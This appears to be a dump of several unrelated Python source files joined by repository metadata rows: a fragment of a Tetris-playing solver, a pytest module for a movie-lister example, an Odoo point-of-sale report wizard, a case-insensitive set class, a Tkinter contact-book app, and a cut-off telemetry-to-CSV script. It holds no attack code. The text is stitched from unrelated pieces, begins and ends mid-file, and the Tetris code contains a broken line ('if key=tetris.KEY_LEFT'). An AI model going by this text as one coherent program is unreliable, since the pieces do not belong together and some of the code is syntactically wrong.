p.map["desx"] = p.map["desx"] - 1
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-2, p.map['desy']):
p.map["desx"] = p.map["desx"] - 2
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-1, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-1, p.map['desy']):
p.map["desx"] = p.map["desx"] - 3
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
elif self.omegamino.hitcheck(self.field, p.map['desy'], p.map["desx"]-2, self.omegamino.minotype[0], p.map["desang"]):
if self.drop_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"]-2, p.map['desy']):
p.map["desx"] = p.map["desx"] - 4
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
p.map['desmove'].append(tetris.KEY_RIGHT)
rlist.append(p)
continue
else:
continue
# spin が必要ない場合で基本的には上から落とせる
# ホールの場合この判定だとバグるがそもそもホールはいい盤面とは言えないのでこれでおけ
#if not self.xspin_judge(self.field, self.omegamino.minotype[0], p.map["desang"], p.map["desx"], p.map['desy']):
# rlist.append(p)
# continue
return rlist
def pos_cmp(self, mvlist, mx, my):
for p in mvlist:
if mx==p[0] and my==p[1]:
return False
return True
def debug_emap_print(self, maplist, index):
os.system('cls')
x = maplist[index].map['desx']
y = maplist[index].map['desy']
ang = maplist[index].map['desang']
buffield = copy.deepcopy(self.field)
for fy in range(4):
for fx in range(4):
if x+fx >= 0 and x+fx <= 11 and y+fy <= 20:
buffield[y+fy][x+fx] = buffield[y+fy][x+fx] or self.omegamino.minodate[self.omegamino.minotype[0]][ang][fy][fx]
for q in buffield:
for p in q:
if p==0:
print(f"{Color.WHITE}"+str(p)+' ', end='')
elif p==1:
print(f"{Color.PURPLE}"+str(p)+' ', end='')
elif p==2:
print(f"{Color.SKYBLUE}"+str(p)+' ', end='')
elif p==3:
print(f"{Color.YELLOW}"+str(p)+' ', end='')
elif p==4:
print(f"{Color.ORANGE}"+str(p)+' ', end='')
elif p==5:
print(f"{Color.BLUE}"+str(p)+' ', end='')
elif p==6:
print(f"{Color.YELLOWGREEN}"+str(p)+' ', end='')
elif p==7:
print(f"{Color.RED}"+str(p)+' ', end='')
print(f"{Color.RESET}")
def evaulate_map(self):
self.calcflag = True
maplist = self.search_map()
mr = random.randint(0,len(maplist)-1)
# コンソールにデバッグ画面の表示
self.debug_emap_print(maplist, mr)
# 新しい評価盤面を追加するため先頭を削除
self.posminolist.pop(0)
self.posminolist.append(maplist[mr])
self.calcflag = False
# 手順としては、1,ミノのangを合わせるー>2,ミノのxをそろえるー>3,ミノのyをそろえる
# tspin等は、回転するその一歩手前に目標座標を設置し、回転させる
def return_ctllist(self, curx, cury, curang):
self.calcflag = True
key = tetris.KEY_UP
# 目的座標
# 0:x, 1:y, 2:ang
fmino = self.posminolist[0]
# 回転
if curang==fmino.map['desang'] and curx==fmino.map['desx'] and cury==fmino.map['desy'] and not len(fmino.map['desmove'])==0:
print("d;alfjksd;lkfajsd")
key = fmino.map['desmove'].pop(0)
if key=tetris.KEY_LEFT:
self.posminolist[0].map['desx'] = self.posminolist[0].map['desx'] - 1
elif key ==tetris.KEY_RIGHT:
self.posminolist[0].map['desx'] = self.posminolist[0].map['desx'] + 1
elif not curang==fmino.map['desang']:
key = tetris.KEY_TURNRIGHT
elif curx < fmino.map['desx']:
print(f"RIGHT : {curx} : {fmino.map['desx']}")
key = tetris.KEY_RIGHT
elif curx > fmino.map['desx']:
print(f"LEFT : {curx} : {fmino.map['desx']}")
key = tetris.KEY_LEFT
elif not cury==fmino.map['desy']:
key = tetris.KEY_DOWN
self.calcflag = False
return key
class Color:
    """ANSI escape sequences for colored console output."""
    BLACK = '\033[30m'                      # foreground black
    RED = '\033[31m'                        # foreground red
    GREEN = '\033[32m'                      # foreground green
    YELLOW = '\033[33m'                     # foreground yellow
    YELLOWGREEN = '\033[38;2;171;207;0m'    # foreground yellow-green (24-bit)
    BLUE = '\033[34m'                       # foreground blue
    SKYBLUE = '\033[38;2;102;204;255m'      # foreground sky blue (24-bit)
    MAGENTA = '\033[35m'                    # foreground magenta
    CYAN = '\033[36m'                       # foreground cyan
    WHITE = '\033[37m'                      # foreground white
    PURPLE = '\033[38;2;255;0;255m'         # foreground purple (24-bit)
    ORANGE = '\033[38;2;255;165;0m'         # foreground orange (24-bit)
    COLOR_DEFAULT = '\033[39m'              # reset foreground to default
    BOLD = '\033[1m'                        # bold
    UNDERLINE = '\033[4m'                   # underline
    INVISIBLE = '\033[08m'                  # concealed text
    REVERCE = '\033[07m'                    # swap foreground/background
    BG_BLACK = '\033[40m'                   # background black
    BG_RED = '\033[41m'                     # background red
    BG_GREEN = '\033[42m'                   # background green
    BG_YELLOW = '\033[43m'                  # background yellow
    BG_BLUE = '\033[44m'                    # background blue
    BG_MAGENTA = '\033[45m'                 # background magenta
    BG_CYAN = '\033[46m'                    # background cyan
    BG_WHITE = '\033[47m'                   # background white
    BG_DEFAULT = '\033[49m'                 # reset background to default
    # FIX: this final line was corrupted by trailing junk characters in the
    # source, which made the whole class a syntax error.
    RESET = '\033[0m'                       # reset all attributes
"ttnmrm1m3k5g1m3r3k@gmail.com"
] | ttnmrm1m3k5g1m3r3k@gmail.com |
9d1dac5b257b8cede94841ba46f28182fe9012f8 | 5d078b5af750e3d4fc2fc9e5b1c834b0329a34ca | /examples/miniapps/movie-lister/movies/tests.py | f6bfe81febcf3c4a2e6c02b24ab75ff0405b92f2 | [] | no_license | battyone/python-dependency-injector | 683e27be7632165764a5c957fa8dd3dbf546c77a | 53b7ad02759e9ab35a7e7c0c1fab58d523c79f3e | refs/heads/master | 2022-12-19T08:24:33.537046 | 2020-09-14T00:56:13 | 2020-09-14T00:56:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,411 | py | """Tests module."""
from unittest import mock
import pytest
from .containers import ApplicationContainer
@pytest.fixture
def container():
    """Application container wired with fake finder settings for tests."""
    test_config = {
        'finder': {
            'type': 'csv',
            'csv': {
                'path': '/fake-movies.csv',
                'delimiter': ',',
            },
            'sqlite': {
                'path': '/fake-movies.db',
            },
        },
    }
    app_container = ApplicationContainer()
    app_container.config.from_dict(test_config)
    return app_container
def test_movies_directed_by(container):
    """Only movies by the requested director are returned."""
    fake_finder = mock.Mock()
    fake_finder.find_all.return_value = [
        container.movie('The 33', 2015, 'Patricia Riggen'),
        container.movie('The Jungle Book', 2016, 'Jon Favreau'),
    ]

    with container.finder.override(fake_finder):
        result = container.lister().movies_directed_by('Jon Favreau')

    assert len(result) == 1
    assert result[0].title == 'The Jungle Book'
def test_movies_released_in(container):
    """Only movies from the requested year are returned."""
    fake_finder = mock.Mock()
    fake_finder.find_all.return_value = [
        container.movie('The 33', 2015, 'Patricia Riggen'),
        container.movie('The Jungle Book', 2016, 'Jon Favreau'),
    ]

    with container.finder.override(fake_finder):
        result = container.lister().movies_released_in(2015)

    assert len(result) == 1
    assert result[0].title == 'The 33'
| [
"noreply@github.com"
] | noreply@github.com |
7f0416307b8c694260d09aa9e48f3b5b5eef0c40 | 71460476c5f5ebdca719def124f1a0650861fdab | /mint_work/custom/pos_order_history_type/models/pos_sales_multi_report.py | af374a7c0fa77f540ef7d46732c590d9499bb3eb | [] | no_license | merdhah/dubai_work | fc3a70dc0b1db6df19c825a3bf1eef2a373d79c0 | e24eb12b276a4cd5b47a4bd5470d915179872a4f | refs/heads/master | 2022-01-07T11:22:07.628435 | 2018-10-17T13:37:24 | 2018-10-17T13:37:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Bista Solutions Pvt. Ltd
# Copyright (C) 2018 (http://www.bistasolutions.com)
#
##############################################################################
from odoo import models, fields, api, _
from odoo.exceptions import UserError
class PosSalesReportProductType(models.TransientModel):
    """Wizard that prints a POS sales report filtered by product type
    and, optionally, by POS order state."""
    _name = 'pos.sales.report.type'

    # company providing logo/address data for the report header
    company_id = fields.Many2one('res.company', default=lambda self: self.env.user.company_id.id)
    type = fields.Selection([
        ('consu', 'Consumable'),
        ('service', 'Service'),
        ('product', 'Stockable Product')], string = 'Product Type',
        default = 'consu',
        help = 'A stockable product is a product for which you manage stock. The "Inventory" app has to be installed.\n'
               'A consumable product, on the other hand, is a product for which stock is not managed.\n'
               'A service is a non-material product you provide.\n'
               'A digital content is a non-material product you sell online. The files attached to the products are the one that are sold on '
               'the e-commerce such as e-books, music, pictures,... The "Digital Product" module has to be installed.')
    state = fields.Selection(
        [('draft', 'New'), ('cancel', 'Cancelled'), ('paid', 'Paid'), ('done', 'Posted'), ('invoiced', 'Invoiced')],
        'State')

    # Called from the wizard: collects all POS order lines whose product
    # matches the selected type (and state, when set) and renders the report.
    @api.multi
    def sales_order_report_type(self):
        """Build the report payload and return the report action.

        :raises UserError: when no order line matches the selection.
        """
        self.ensure_one()
        data = {
            'ids': self.id,
            'model': 'pos.sales.report',
            'form': self.read()[0],
        }
        # SECURITY FIX: pass values as query parameters instead of
        # interpolating them into the SQL string with % formatting.
        query = """
            select po.name as order,pt.name,pp.barcode, pol.qty, pol.price_unit
            from pos_order_line pol
            left join pos_order po ON (po.id = pol.order_id)
            left join product_product pp ON (pp.id = pol.product_id)
            left join product_template pt ON (pt.id = pp.product_tmpl_id)
            where pt.type = %s"""
        params = [self.type]
        if self.state:
            query += " and po.state = %s"
            params.append(self.state)
        self.env.cr.execute(query, tuple(params))
        result = self._cr.dictfetchall()
        if result:
            data.update({
                'company_logo': self.company_id.logo,
                'company_name': self.company_id.partner_id.name,
                'company_street': self.company_id.partner_id.street,
                'company_street2': self.company_id.partner_id.street2,
                'company_city': self.company_id.partner_id.city,
                'company_state_id': self.company_id.partner_id.state_id.name,
                'company_country_id': self.company_id.partner_id.country_id.name,
                'company_zip': self.company_id.partner_id.zip,
                'company_phone': self.company_id.partner_id.phone,
                'company_mobile': self.company_id.partner_id.mobile,
                'company_fax': self.company_id.partner_id.fax,
                'company_email': self.company_id.partner_id.email,
                'company_website': self.company_id.partner_id.website,
                'product_type_name': self.type,
                'lines': result,
            })
        else:
            raise UserError(
                _('There is no Record related to this Product Type.'))
        return self.env['report'].get_action(self,
            'pos_order_history_type.report_sale_orders_type', data=data)
class ReportPOSSaleOrderProductTypeMulti(models.AbstractModel):
    """QWeb renderer for the 'sales orders by product type' report."""
    _name = 'report.pos_order_history_type.report_sale_orders_type'

    @api.multi
    def render_html(self, docids, data=None):
        # Render the QWeb template with the payload built by the wizard;
        # falls back to an empty dict when no data is provided.
        return self.env['report'].render('pos_order_history_type.report_sale_orders_type', dict(data or {}))
| [
"asghar0517@gmail.com"
] | asghar0517@gmail.com |
a7afecd37e918863ce882a587b97678ec8755db7 | 8bb349af63c2edb9971069c9af476286499386f5 | /web/commons/util/case_insensitive_set.py | 868801da56fe3019f8357575ab27920523f7b565 | [
"MIT"
] | permissive | chicommons/maps | 061760d3a48c9350bdee9a4bee9b8e4657fce209 | 78044c30d2d88401d2f2188d96ff7e9f18a8430e | refs/heads/master | 2023-08-19T05:21:32.744965 | 2022-10-06T16:37:55 | 2022-10-06T16:37:55 | 236,360,812 | 6 | 22 | MIT | 2023-02-08T00:44:51 | 2020-01-26T19:01:24 | JavaScript | UTF-8 | Python | false | false | 637 | py | from collections import MutableSet
# FIX: the MutableSet ABC moved to collections.abc; importing it from
# `collections` raises ImportError on Python 3.10+.
try:
    from collections.abc import MutableSet  # Python 3.3+
except ImportError:  # pragma: no cover - legacy interpreters only
    from collections import MutableSet


class CaseInsensitiveSet(MutableSet):
    """A mutable set of strings whose membership tests ignore case.

    The most recently added spelling of each value is preserved and
    yielded on iteration; lookups compare case-folded keys.
    """

    def __init__(self, *values):
        self._values = {}          # casefolded key -> original spelling
        self._fold = str.casefold  # canonical case-folding function
        for v in values:
            self.add(v)

    def __contains__(self, value):
        return self._fold(value) in self._values

    def __iter__(self):
        return iter(self._values.values())

    def __len__(self):
        return len(self._values)

    def add(self, value):
        self._values[self._fold(value)] = value

    def discard(self, value):
        # discard() must not raise for missing members (MutableSet contract).
        self._values.pop(self._fold(value), None)
"laredotornado@gmail.com"
] | laredotornado@gmail.com |
739a6fa4db6e93e4f152ee82b688209c95beaf9b | fa39d5a58e0bab026d1f224eebf8e396266ad62d | /codekata/50.power of 2.py | a1970c33d65db91e6d05a4bd000412e47931ce09 | [] | no_license | renugambal/guvi | 23192431b670b2193c2430aab82ea81a543f1c13 | e4b893e941e3cd8fddcf6adbdf076b8927f68b75 | refs/heads/master | 2020-06-03T00:07:44.482826 | 2019-06-26T11:27:11 | 2019-06-26T11:27:11 | 191,355,051 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | z=int(input())
# A positive integer is a power of two iff it has exactly one set bit,
# i.e. z & (z - 1) == 0.  BUG FIX: guard z > 0 -- the bit trick alone
# wrongly classified 0 (0 & -1 == 0) as a power of two.
if z > 0 and (z & (z - 1)) == 0:
    print("yes")
else:
    print("no")
| [
"noreply@github.com"
] | noreply@github.com |
731842503a086b941ed1861a2f341ed9a8452487 | 8533aeeaeb12248f3f4d8e7bf3ab092bee8eb881 | /build/lib/sedna/server.py | c9272ea052562ead093ccdabf02673ecb442f002 | [] | no_license | Jiakun/all_autotests | 6f5d977590b4a0cc5cef7c3df21758f4f660c987 | cde85988fa008c083afbeb980fa66960dbe3cb23 | refs/heads/master | 2021-01-18T16:47:40.916399 | 2017-04-05T04:14:26 | 2017-04-05T04:14:26 | 86,769,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,034 | py | from time import sleep
import re
from SimpleXMLRPCServer import SimpleXMLRPCServer
from sedna.common import Service
from sedna.sampler import NodeSampler
from sedna.ha.services import ServiceKiller, ServiceCommand, NodeHATest
from sedna.thread import HADaemonThread, HAScenarioThread
from sedna.ha.ha import HAResult, HAStep, HAStage
from sedna.scenario.scenario import Status
from sedna.observer import Observable, LoggerObserver, ObserverInfoType
import logging.config
LOG = logging.getLogger("")
# Module-level HADaemonThread intended as a shared registry for HA
# scenario threads.
# NOTE(review): nothing else in this module reads this global --
# NodeServer builds its own HADaemonThread in __init__; confirm it is
# used elsewhere before relying on (or removing) it.
ha_daemon_thread = HADaemonThread()
class NodeServiceProvider(object):
    """Facade over the node-side operations: sampling services, killing
    them, running service commands, and executing HA scenarios.

    Each call creates a fresh collaborator and keeps it on the instance.
    """

    def __init__(self):
        # Collaborators are created lazily, one per operation call.
        self.killer = None
        self.service_commander = None
        self.sampler = None
        self.ha_tester = None

    def sample(self, services=None, name=None, klass=None):
        """Register a service class on a fresh sampler, then sample."""
        self.sampler = NodeSampler()
        self.sampler.register_service(name=name, klass=klass)
        return self.sampler.sample(services=services)

    def kill(self, services):
        """Kill the given services on this node."""
        self.killer = ServiceKiller()
        return self.killer.kill_services(services)

    def run_service_command(self, service, operation):
        """Run `systemctl <operation>` for services managed by systemd;
        returns None for any other management method."""
        self.service_commander = ServiceCommand()
        if service.methods == "systemd":
            return self.service_commander.execute(
                service.name, "systemctl " + operation + " ")

    def run_ha_scenario(self, scenario_class=None, times=None):
        """Run an HA scenario `times` times via a fresh NodeHATest."""
        self.ha_tester = NodeHATest()
        return self.ha_tester.run_ha_scenario(
            scenario_class=scenario_class, times=times)
class NodeServer(object):
    """
    XML-RPC wrapper exposing the node services (sampling, killing,
    service commands and HA scenarios) on a TCP port.
    """
    def __init__(self, port, sampler=None, killer=None, s_commander=None,
                 ha_tester=None, observable=None):
        """
        Server initializer.
        :param port: the port the server listens to (any int-convertible)
        :param sampler: NodeSampler-like instance; a default is created
            when None
        :param killer: ServiceKiller-like instance; default when None
        :param s_commander: ServiceCommand-like instance; default when None
        :param ha_tester: NodeHATest-like instance; default when None
        :param observable: Observable used to report HA progress; when
            None a default with a logging observer is installed
        """
        self._port = int(port)
        # Listen on all interfaces; the instance's public methods become
        # the RPC surface via register_instance.
        self._server = SimpleXMLRPCServer(("0.0.0.0", self._port))
        self._server.register_multicall_functions()
        self._server.register_instance(self)
        if sampler is None:
            self._sampler = NodeSampler()
        else:
            self._sampler = sampler
        if killer is None:
            self._killer = ServiceKiller()
        else:
            self._killer = killer
        if s_commander is None:
            self._service_commander = ServiceCommand()
        else:
            self._service_commander = s_commander
        if ha_tester is None:
            self._ha_tester = NodeHATest()
        else:
            self._ha_tester = ha_tester
        if observable is not None:
            self.observable = observable
        else:
            # Default observer
            self.observable = Observable()
            self.observable.register_observer(
                LoggerObserver(logger=LOG, info_type=ObserverInfoType.HA))
        # Tracks the currently registered HA scenario thread (if any).
        self.ha_daemon_thread = HADaemonThread()

    def start(self):
        """
        Start the server. Blocks forever serving RPC requests.
        """
        LOG.info("Listening in port %s." % self._port)
        self._server.serve_forever()

    def sample(self, services):
        """
        RPC entry point: convert the service dicts sent by the master
        back into Service objects and sample them.
        :param services: list of dicts, each the keyword form of a
            Service object
        :return: the sampler's result for these services
        """
        list_services = []
        LOG.info("Receive raw info from Master: %s" % services)
        for service in services:
            list_services.append(Service(**service))
        LOG.info("Receive format info from Master: %s" %
                 list_services)
        return self._sampler.sample(list_services)

    def kill(self, services):
        """
        RPC entry point: convert the service dicts sent by the master
        back into Service objects, then kill them on this node.
        :param services: list of dicts, each the keyword form of a
            Service object
        :return: the killer's result for these services
        """
        list_services = []
        LOG.info("Receive raw info from Master: %s" % services)
        for service in services:
            list_services.append(Service(**service))
        LOG.info("Receive format info from Master: %s" %
                 list_services)
        return self._killer.kill_services(list_services)

    def run_service_command(self, service, operation):
        """
        RPC entry point: run `systemctl <operation>` for a service dict
        whose 'methods' is 'systemd'.
        :param service: dict with at least 'name' and 'methods' keys
        :param operation: systemctl verb, e.g. 'start'/'stop'/'restart'
        :return: dict {'status': ..., 'service': service}; implicitly
            None when the service is not systemd-managed
        """
        if service["methods"] == "systemd":
            raw_result = self._service_commander.execute(
                service["name"], "systemctl " + operation + " ")
            result = {'status': raw_result[0],
                      'service': service
                      }
            return result

    def run_ha_scenario(self, scenario, times=None):
        """
        RPC entry point: (re)start an HA scenario as a daemon thread.
        :param scenario: scenario class/name to run
        :param times: scenario running times
        :return: 0 on success, -1 on failure; implicitly None when the
            same scenario is already registered and considered alive
        """
        def create_ha_thread():
            # Start a fresh scenario thread, wait for its first iteration
            # to settle, then register it.  Returns 0/-1 for success/fail.
            self.observable.notify_observer(
                HAResult(name=scenario,
                         step="start",
                         stage=HAStage.EXECUTING,
                         status=Status.SUCCEEDED))
            create_thread = None
            try:
                create_thread = HAScenarioThread(
                    ha_tester=self._ha_tester, scenario=scenario,
                    times=times)
                create_thread.setDaemon(True)
                create_thread.start()
                # wait for the first scenario
                while create_thread.get_executed_status() is False:
                    if create_thread.get_result() == -1:
                        self.observable.notify_observer(
                            HAResult(name=scenario,
                                     step="start",
                                     stage=HAStage.EXECUTED,
                                     status=Status.FAILED))
                        return -1
                    elif create_thread.get_result() == 0:
                        break
                    sleep(1)
            # NOTE(review): bare except also swallows SystemExit and
            # KeyboardInterrupt; `except Exception` would be safer.
            except:
                self.observable.notify_observer(
                    HAResult(name=scenario,
                             step="start",
                             stage=HAStage.EXECUTED,
                             status=Status.FAILED))
                return -1
            self.observable.notify_observer(
                HAResult(name=scenario,
                         step="start",
                         stage=HAStage.EXECUTED,
                         status=Status.SUCCEEDED))
            self.ha_daemon_thread.register_thread(
                ha_thread=create_thread, scenario=scenario)
            return 0

        # check whether the thread failed
        if scenario == self.ha_daemon_thread.scenario:
            # NOTE(review): if HAScenarioThread inherits threading.Thread,
            # `is_alive` without parentheses is a bound method and always
            # truthy, so this branch would never restart a dead thread --
            # confirm whether `is_alive` is a property here.
            if not self.ha_daemon_thread.ha_thread.is_alive:
                return create_ha_thread()
            # Same scenario still running: fall through, returning None.
        else:
            # determine whether to kill the previous daemon thread
            self.observable.notify_observer(
                HAResult(name=scenario,
                         step="stop",
                         stage=HAStage.EXECUTING,
                         status=Status.SUCCEEDED))
            if self.ha_daemon_thread.ha_thread is not None:
                # stop previous daemon thread
                try:
                    self.ha_daemon_thread.ha_thread.stop()
                    while self.ha_daemon_thread.ha_thread.get_result() is None:
                        # TODO: failed scenario is acceptable?
                        sleep(1)
                # NOTE(review): bare except -- see note above.
                except:
                    self.observable.notify_observer(
                        HAResult(name=scenario,
                                 step="stop",
                                 stage=HAStage.EXECUTED,
                                 status=Status.FAILED))
                    return -1
                self.observable.notify_observer(
                    HAResult(name=scenario,
                             step="stop",
                             stage=HAStage.EXECUTED,
                             status=Status.SUCCEEDED))
            return create_ha_thread()

    def get_ha_scenario_status(self):
        """Report (and notify observers) whether the registered HA
        scenario thread is considered alive.
        NOTE(review): `is_alive` is not called here either -- see the
        note in run_ha_scenario."""
        if self.ha_daemon_thread.ha_thread.is_alive:
            self.observable.notify_observer(
                HAResult(name="scenario check",
                         step="check",
                         stage="alive",
                         status=Status.SUCCEEDED))
            return True
        else:
            self.observable.notify_observer(
                HAResult(name="scenario check",
                         step="check",
                         stage="stopped",
                         status=Status.SUCCEEDED))
            return False

    def get_ha_daemon_thread(self):
        # Name of the scenario currently registered on this node.
        return self.ha_daemon_thread.scenario
| [
"fjkmail@163.com"
] | fjkmail@163.com |
92f14e257307446a72feaa6fa67fe33995f82ff2 | 5b2c50a72bce5c303757e00ea16dfc000120dd7b | /Corte 3/TALLER INTERFACES GRAFICAS DE USUARIO CON TKINTER/main.py | 9bf17604086deb7be282920eadf885139d467484 | [] | no_license | LuisGomez11/Python | 8efe6ae50ef6011b65e605fcf1750442fca61971 | aa9c79cdfae80811fe6a9c3ab06574b1bcecfc86 | refs/heads/master | 2020-04-28T20:36:59.076071 | 2019-05-11T11:06:18 | 2019-05-11T11:06:18 | 175,550,921 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,554 | py | from tkinter import *
from tkinter import messagebox
lista = []
def guardar():
    """Read the form fields, append the new contact, persist the agenda,
    notify the user, clear the form and refresh the table."""
    # record layout: nombre$apPaterno$apMaterno$telefono$correo
    registro = "$".join([nombre.get(), apellidoP.get(), apellidoM.get(),
                         telefono.get(), correo.get()])
    lista.append(registro)
    escribirContacto()
    messagebox.showinfo("Guardado","El contacto ha sido guardado en la agenda")
    for campo in (nombre, apellidoP, apellidoM, correo, telefono):
        campo.set("")
    consultar()
def eliminar():
    """Remove the contact(s) whose phone number matches the spinbox value,
    persist the agenda and refresh the table."""
    eliminado = conteliminar.get()
    removido = False
    # BUG FIX: iterate over a copy -- removing from `lista` while
    # iterating it skips the element that slides into the removed slot.
    for elemento in list(lista):
        arreglo = elemento.split("$")
        # field 3 of the "$"-joined record is the phone number
        if conteliminar.get() == arreglo[3]:
            lista.remove(elemento)
            removido = True
            escribirContacto()
            consultar()
    if removido:
        messagebox.showinfo("Eliminar","Elemento eliminado "+eliminado)
def consultar():
    """Redraw the read-only contact table and the phone-number spinbox."""
    # NOTE(review): a new Text widget is created on every call and the old
    # one is never destroyed, so widgets pile up on top of each other.
    r = Text(ventana, width=80, height=15)
    lista.sort()
    valores = []  # phone numbers collected below (currently unused)
    r.insert(INSERT, "Nombre\tApellido Pa\t\tApellido Ma\t\tTeléfono\t\tCorreo\n")
    for elemento in lista:
        # record layout: nombre$apPaterno$apMaterno$telefono$correo
        arreglo = elemento.split("$")
        valores.append(arreglo[3])
        r.insert(INSERT, arreglo[0]+"\t"+arreglo[1]+"\t\t"+arreglo[2]+"\t\t"+arreglo[3]+"\t\t"+arreglo[4]+"\t\n")
    r.place(x=20,y=350)
    spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
    # NOTE(review): this branch recreates an identical Spinbox when the
    # list is empty -- it appears to have no visible effect; confirm intent.
    if lista == []:
        spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
    r.config(state=DISABLED)
def iniciarArchivo():
    """Create ag.txt if it does not exist yet (open for append, close)."""
    with open("ag.txt", "a"):
        pass
def cargar():
    """Load previously saved contacts from ag.txt into `lista`,
    stripping the trailing newline from each record."""
    with open("ag.txt", "r") as archivo:
        for linea in archivo:
            if linea.endswith('\n'):
                linea = linea[:-1]
            lista.append(linea)
def escribirContacto():
    """Persist the contact list to ag.txt, one record per line.
    Note: sorts `lista` in place as a side effect."""
    lista.sort()
    with open("ag.txt", "w") as archivo:
        archivo.writelines(registro + "\n" for registro in lista)
ventana = Tk()
# Tk string variables bound to the form fields
nombre = StringVar()
apellidoP = StringVar()
apellidoM = StringVar()
correo = StringVar()
telefono = StringVar()
conteliminar = StringVar()
# Colors
colorFondo = "#066"
colorLetra = "#FFF"
iniciarArchivo()
cargar()
consultar()
# Window options
ventana.title("Agenda de archivos")
ventana.geometry("700x500")
ventana.configure(background = colorFondo)
# Labels, entry boxes and buttons
# NOTE(review): .place() returns None, so every variable assigned below
# (titulo, cajaNombre, ...) holds None, not the widget.
titulo = Label(ventana, text="Agenda de archivos", fg=colorLetra, bg=colorFondo).place(x=280,y=10)
labelNombre = Label(ventana, text="Nombre", bg=colorFondo, fg=colorLetra).place(x=50, y=60)
cajaNombre = Entry(ventana, textvariable = nombre).place(x=160, y=60)
labelApellidoP = Label(ventana, text="Apellido Paterno", bg=colorFondo, fg=colorLetra).place(x=50, y=100)
cajaApellidoP = Entry(ventana, textvariable = apellidoP).place(x=160, y=100)
labelApellidoM = Label(ventana, text="Apellido Materno", bg=colorFondo, fg=colorLetra).place(x=50, y=140)
cajaApellidoM = Entry(ventana, textvariable = apellidoM).place(x=160, y=140)
labelCorreo = Label(ventana, text="Correo", bg=colorFondo, fg=colorLetra).place(x=50, y=180)
cajaCorreo = Entry(ventana, textvariable = correo).place(x=160, y=180)
labelTelefono = Label(ventana, text="Telefono", bg=colorFondo, fg=colorLetra).place(x=50, y=220)
cajaTelefono = Entry(ventana, textvariable = telefono).place(x=160, y=220)
labelEliminar = Label(ventana, text="Telefono", bg=colorFondo, fg=colorLetra).place(x=370, y=60)
spinTelefono = Spinbox(ventana, textvariable=conteliminar).place(x=450,y=60)
btnGuardar = Button(ventana, text="GUARDAR", command=guardar, bg="#009", fg="white").place(x=180, y=260)
btnEliminar = Button(ventana, text="ELIMINAR", command=eliminar, bg="#009", fg="white").place(x=490, y=100)
mainloop()
| [
"luisgomez24g@gmail.com"
] | luisgomez24g@gmail.com |
c34c9a8ff10d27423ec58705c27a4ad422e7a08a | 98897a706b48f40ac34cf6d1722e086bd87043ff | /analysis_everglades/first_unit_lost_script.py | 3c59c74c4714f5be0fe1fa913f493aef13a837fb | [] | no_license | shaunhyp57/everglades | dae28fb1695443fb6bb0a1e7c81d50b320dba400 | e4aab93d7fe8147ed3917605b2755ed429884b84 | refs/heads/master | 2022-04-25T03:07:24.999084 | 2020-04-27T16:32:12 | 2020-04-27T16:32:12 | 238,527,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,940 | py | import os
import csv
rootdir = 'game_telemetry'
def list_files(rootdir):
    """Walk the telemetry tree and write one CSV row per game, combining
    game-score, first-disband and group-initialization telemetry.

    NOTE(review): relies on sorted directory walking so that the Scores,
    Disband and Initialization files of a game are seen before its
    PLAYER_Tags file -- TFG_List/TGD_List/TFI_List raise NameError if
    that ordering ever breaks.  Also, `fileCSV` is never closed; output
    may be truncated unless the interpreter flushes on exit.
    """
    # maps the unit-type tag (from initialization telemetry) to a weight
    Unit_Type_Dict={"[Striker]":1,"[Tank]":2,"[Controller]":3}
    # sign applied per losing player (0 -> -1, 1 -> +1); shadows builtin `list`
    list=[-1,1]
    r = []
    i=0
    fileCSV = open("firstUnitLost_target4_randact","w")
    fileCSV.write("numberOfTurns"+','+
                  "winType"+','+"player_0"+','+
                  "player_1"+','+"unitLossTurn"+','+
                  "unitLostPlayer"+","+"unitLostType"+','+
                  "combinedStat"+','+"winner"+'\n')
    for root, dirs, files in os.walk(rootdir):
        dirs.sort()
        files.sort()
        for name in files:
            fullPath=(os.path.join(root, name))
            #print(fullPath)
            fullPathList=[]
            fullPathList=fullPath.split('/')
            # NOTE(review): str() of a list slice plus replace() is a
            # fragile way to extract the file name; fullPathList[-1]
            # would be more direct -- confirm the expected tree depth.
            current_File = str(fullPathList[3:])
            current_File=current_File.replace('[','').replace(']','').replace("'",'')
            if current_File == "Telem_GAME_Scores":
                #print("current file is Telem_GAME_Scores")
                TFG_List=get_Turns(fullPath)
            if current_File == "Telem_GROUP_Disband":
                #print("current file is Telem_GROUP_Disband")
                TGD_List=get_dispand_info(fullPath)
                #print("TGD List")
                #print(TGD_List)
            if current_File == "Telem_GROUP_Initialization":
                #print("current file is Telem_GROUP_Initialization")
                TFI_List=get_Initialization_info(fullPath)
                #print(TFI_List)
            if current_File == "Telem_PLAYER_Tags":
                # PLAYER_Tags marks the end of one game's telemetry:
                # emit the combined CSV row for this game.
                #print("current file is Telem_PLAYER_Tags")
                #print("TFG Game_Scores: " + str(TFG_List))
                #print("TGD Group Disband: " + str(TGD_List))
                #print("TFI Group Init: " + str(TFI_List))
                fileCSV.write(str(TFG_List[0])+','+
                              str(TFG_List[1])+','+
                              str(TFG_List[2])+','+
                              str(TFG_List[3])+','+
                              str(TGD_List[0])+','+
